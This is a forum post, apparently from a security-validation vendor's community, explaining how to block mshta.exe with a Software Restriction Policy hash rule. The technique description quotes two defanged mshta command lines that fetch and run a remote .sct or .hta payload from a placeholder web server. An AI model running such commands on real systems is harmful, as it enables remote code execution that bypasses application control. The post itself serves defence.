How to use mitigation steps to block MSHTA execution scenarios

  • 8 March 2023
  • 0 replies
  • 771 views

In this article I will describe how you can use Cymulate's mitigation recommendations to effectively restrict certain attack techniques from occurring in your environment, as recently a lot of questions have arisen involving the use of MSHTA and how to block it I decided to create this quick guide that can be applied in any environment.

MSHTA Technique Context:

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. Files may be executed by mshta.exe through an inline script: mshta
vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.

Ref.: https://attack.mitre.org/techniques/T1218/005/

All of the above information and more could be accessed by the Cymulate console as per the below screenshot:

We can observe that the use of MSHTA can facilitate the execution of different codes through a native resource in the operating system, in this way, since its functionality is linked to older versions of Internet Explorer that have reached the end of their useful life, the recommendation is that the resource is blocked thus preventing the use of techniques that abuse this binary.

One of the fastest ways to follow the mitigation recommendation can be the use of a software restriction GPO, therefore, to carry out this procedure, follow the steps below:

  1. Open Start.
  2. Search for Local Group Policy and click the top result to open the app.
  3. Double-click to expand the Software Restriction Policies branch.
  4. Right-click the "Additional Rules" category, and select the New Hash Rule option.Quick tip: If the category is not available, right-click the Software Restriction Policies branch and select the New Software Restriction Policies option.
     

     

  5. Click the Browse button.
  6. Copy and paste the following path in the address bar to locate the 32-bit version of mshta & mshta.mui and press Enter:
    Mshta: %SystemRoot%\System32\mshta.exe
    Mshta.exe.mui: %SystemRoot%\System32\en-US\mshta.exe.mui
  7. Click the Open button for search manually the executable if it is on a different directory.
  8. Click the Apply button.
  9. Click the OK button.

    At the end of the procedure, after adding all the rules mentioned above, your GPO should look like the example:

    To validate if your group policy is working, open cmd and type "gpupdate /force" to force the update of policies on the equipment and then try to run mshta manually, if your policy was successfully applied a blocking message will be displayed .
     

    That's it, now in the next security validations with Cymulate you should notice that the use of the technique involving MSHTA will no longer have effect and that all steps involving this execution will fail, to learn more how to create custom scenarios which will allow you to select only executions of this like see: 

    C


0 replies

Be the first to reply!

Reply